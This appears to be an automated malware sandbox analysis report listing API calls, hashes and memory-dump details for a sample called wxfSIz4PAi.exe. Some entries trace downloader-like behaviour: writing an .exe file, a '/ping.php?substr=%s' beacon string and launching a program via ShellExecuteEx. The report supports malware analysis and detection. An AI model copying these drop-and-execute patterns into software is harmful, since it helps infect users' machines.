                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                              • Instruction ID: 804699b6a5c80bac2842bae3f4e6e7460cbec33686f784624dec7bd42b1af61a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90edccbe862cdad6193eb808b69496e37856ffec839fd57042e26aa05c578d31
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41F030714413209B8A16BF15FC416893B60FB4871831275AFF50866275CB3959918FCE
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 0-2895899722
                                                                                                                                                                                                                              • Opcode ID: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
                                                                                                                                                                                                                              • Instruction ID: ae3557305dc9c54a6d59b1edd30c6b9f9c56a404ae947bd98c264bdf0008d32a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70cdf97db86fb0d935fe44adb4be9c8666ab98f3e4a20976dc49b384eadb291b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF51D171D00209ABDB10AFA9C845FEF7BB8AF45314F12015BE804B7292D778D982CB69
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\wxfSIz4PAi.exe,00000104), ref: 05B7356A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B73635
                                                                                                                                                                                                                              • _free.LIBCMT ref: 05B7363F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                              • API String ID: 2506810119-4117991884
                                                                                                                                                                                                                              • Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                              • Instruction ID: e1d83d8884dc6b3ff51b7a9b437d4aae6931abffcdc724a40792d48e87f13da3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 483180B1E0425CAFDB21DF999C84DAEBBFDEF84710F1044E6E52597210DB70AA40DB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\wxfSIz4PAi.exe,00000104), ref: 00413303
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004133CE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 004133D8
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$FileModuleName
                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                              • API String ID: 2506810119-4117991884
                                                                                                                                                                                                                              • Opcode ID: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                              • Instruction ID: e0cf6dde0ac7f492d26fb7a27bfd3cf8f71fda75d9391d43b3cd8632259efb82
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb31f26f73b597728b2cacf79e07e2f55e925ef4aaaec1d2d24814769dd1ca0b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72319371A0021CABDB219F9698819DEBBB8EB85315F1041ABED14D7210DB799A81CB9C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 05B867B9
                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 05B867CD
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 05B867D6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                                              • API String ID: 3837156514-4119554291
                                                                                                                                                                                                                              • Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                              • Instruction ID: 2451dc3099debc2c1fdb426e17f2bc690e376c0b95c098c8cd3e3f950b28c1ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 31017831E0061CEBDF15EFA9E8459EDBBB8FF08640F008126F801A6260EB709A45CF84
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,05B85B74,00000001,?,/ping.php?substr=%s), ref: 05B864C4
                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,05B85B74,00000001,?,/ping.php?substr=%s,?), ref: 05B864DC
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,05B85B74,00000001,?,/ping.php?substr=%s,?), ref: 05B864E5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                              • String ID: .exe
                                                                                                                                                                                                                              • API String ID: 1065093856-4119554291
                                                                                                                                                                                                                              • Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                              • Instruction ID: ace46fbcd38898fb7e349a495090445aecd852183ed9cae5ee4d80f09f4e277c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7E06572601124BBD7311B999C48FABBE6DEF855B0F040165FB05D21109661DD0197B4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                              • Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                              • Instruction ID: eedeff43bb275722d90e0209f48da1e1f5b8f8aa16d6068c55cfb54aa5ce765e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44A14971A0478A9FDB25CF18C899BBEBFE6FF15350F2441EDE5A59B280C234A941C750
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                              • Opcode ID: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                              • Instruction ID: fd8853d8f1522a73f401650a4168fe8705857821074eec12fc08c2aeadde5945
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e51a796a22d9d63a9b00b6eba06f801b3f3ffc83eaf799798e62e4f5953ed77
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EA11272A083869FDB218E18C881BEBBBF1EF55354F1441AEE5859B281D63C8982C758
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
                                                                                                                                                                                                                              • Instruction ID: 3841ededa5281681923a3943c88024336dbe28530cb1e0fdd5429c157cd0fe08
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0327c6b289028ba5b2b3c2fb758003783598fcbdb2bec9316035b6f17d33412a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF413B39B015496BDB257FB88C88A7EBAAAFF05370F1812E5F438D6290DB34B540D761
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                              • Opcode ID: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
                                                                                                                                                                                                                              • Instruction ID: 928e3cb369f2e27a6f9c5d6c25e794823a6f45c2d4bbec1796fd6aa098e8f7c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1eff9f77d6fe5220b41880063169ad7198556d756e84d98a38d826084e6795b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2411B71B002247BDB206B7A9D41BAE36A4EF05334F54021BF818D6291D6FC8DC19669
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042E790,00000000,00000000,8B56FF8B,05B74002,?,00000004,00000001,0042E790,0000007F,?,8B56FF8B,00000001), ref: 05B7B5B4
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 05B7B63D
                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 05B7B64F
                                                                                                                                                                                                                              • __freea.LIBCMT ref: 05B7B658
                                                                                                                                                                                                                                • Part of subcall function 05B77CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05B77CDE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                              • Opcode ID: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
                                                                                                                                                                                                                              • Instruction ID: 06340d571307d4e7138232fa0cd9a1c78ce2e3bc7705e2900585a2ad5747d7d9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c9fcdccec6534139f4d5072acc38e80a3e5bc7209392af5cdc3591196cc905b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3331B072A0020EABDF248F64CC44DAEBBA5FF40610F0401A9ED29D7150EB35ED60CBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 05B6CF2B
                                                                                                                                                                                                                                • Part of subcall function 05B6CE78: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 05B6CEA7
                                                                                                                                                                                                                                • Part of subcall function 05B6CE78: ___AdjustPointer.LIBCMT ref: 05B6CEC2
                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 05B6CF40
                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 05B6CF51
                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 05B6CF79
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                              • Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                              • Instruction ID: d2bd455b9704080d494796c8d644d8ccd30ac2b82d9ce4905e02d23314229af7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37012932200109BBCF12AE95CC48EEB7F7AFF99754F044154FE48A6120D73AE861DBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCC4
                                                                                                                                                                                                                                • Part of subcall function 0040CC11: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC40
                                                                                                                                                                                                                                • Part of subcall function 0040CC11: ___AdjustPointer.LIBCMT ref: 0040CC5B
                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0040CCD9
                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCEA
                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0040CD12
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                              • Opcode ID: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                              • Instruction ID: f1d65ff4a2caa8f4402a5ee0af87b259506669f2abbd9cc63769bcbaa0b6a130
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5edf251907e2bd12ab1bab35c72448d2fc128933da46fdb6cd3469693a1eea58
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D012D32500108BBDF116F96CC81DEF7F69EF99758F044129FE0866261D73AE861EBA4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,05B6ED94,00000000,00000000,?,05B77461,05B6ED94,00000000,00000000,00000000,?,05B77719,00000006,0042F348), ref: 05B774EC
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,05B77461,05B6ED94,00000000,00000000,00000000,?,05B77719,00000006,0042F348,0042F340,0042F348,00000000,00000364,?,05B77052), ref: 05B774F8
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,05B77461,05B6ED94,00000000,00000000,00000000,?,05B77719,00000006,0042F348,0042F340,0042F348,00000000), ref: 05B77506
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                              • Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                              • Instruction ID: 1fbc9910f704a99855c7b9d295456594b84a01200cc648066aa5f9d3c86adccd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B801F73675522FABD7318F68AC48E667B99FF057A1F500570FA2AD3180DF20E901C6E4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                              • Opcode ID: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
                                                                                                                                                                                                                              • Instruction ID: 0a9ba9cf01538bb623dd895b254acf0ed02b79a8d0ee48bda8380b1111d13792
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1002f3fead58ecdd09521feafb71d77c6abc34bad63ee383d6bbf70ab6509b6f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3651607175420196C7217718DF813FB6BA0EB40750F64497BE085C23A9EB7D8CE6DA8E
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DE21
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                                              • String ID: $.A
                                                                                                                                                                                                                              • API String ID: 1807457897-2696116503
                                                                                                                                                                                                                              • Opcode ID: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
                                                                                                                                                                                                                              • Instruction ID: bc213980aac5c6bda6009a83c5849e62ad2cee4ae6a6ae2e32fe98ed2f123d1c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 894c406951e1bf4a9ddc63c434b686542591dbb70d0a2e0ead158e77a5fc9e7b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA410AF190434C9EDB218E248D84BFABBB9DF55304F1404EEE58A97142D23DAA86CF65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 05B6A96A
                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 05B6AA23
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                              • Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                              • Instruction ID: eb8f3d218fac1231a60dc8738ab7ccacbff2de9a15e1f7ae2b86f1af6adce7b4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC41A034B04249DBCF10DF68C884AAEBBB5FF45318F1481E6E81A6B291C779A955CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 05B800D4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_5b60000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                              • Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                              • Instruction ID: 2123d7cf3fca51a581b0a72074c15e49876d0f62b7ebef69ff521005ed99659a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1721C462A4410CAAE734BA54C909FB7726BFB44B90F1695E5E90AD7100F737F908C354
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002), ref: 0041FE6D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1982576567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_wxfSIz4PAi.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                              • Opcode ID: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                              • Instruction ID: db8a1e39b5ed56134af0dcb237998205fad8b660637b78a6cadd581e1e0cf4fb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b97aa1c145ec632733d8060ab258c15f3e7cb035cbade5a7dcdad7a6c82acd9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20213872A04301A6DB308E15D9017E7739A9B60B24F164077E90AC7312E73ADDC7C39C
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 05B862B6
                                                                                                                                                                                                                                • Part of subcall function 05B61E19: __EH_prolog.LIBCMT ref: 05B61E1E
                                                                                                                                                                                                                                • Part of subcall function 05B6266A: __EH_prolog.LIBCMT ref: 05B6266F
                                                                                                                                                                                                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05B86398
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1986509870.0000000005B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
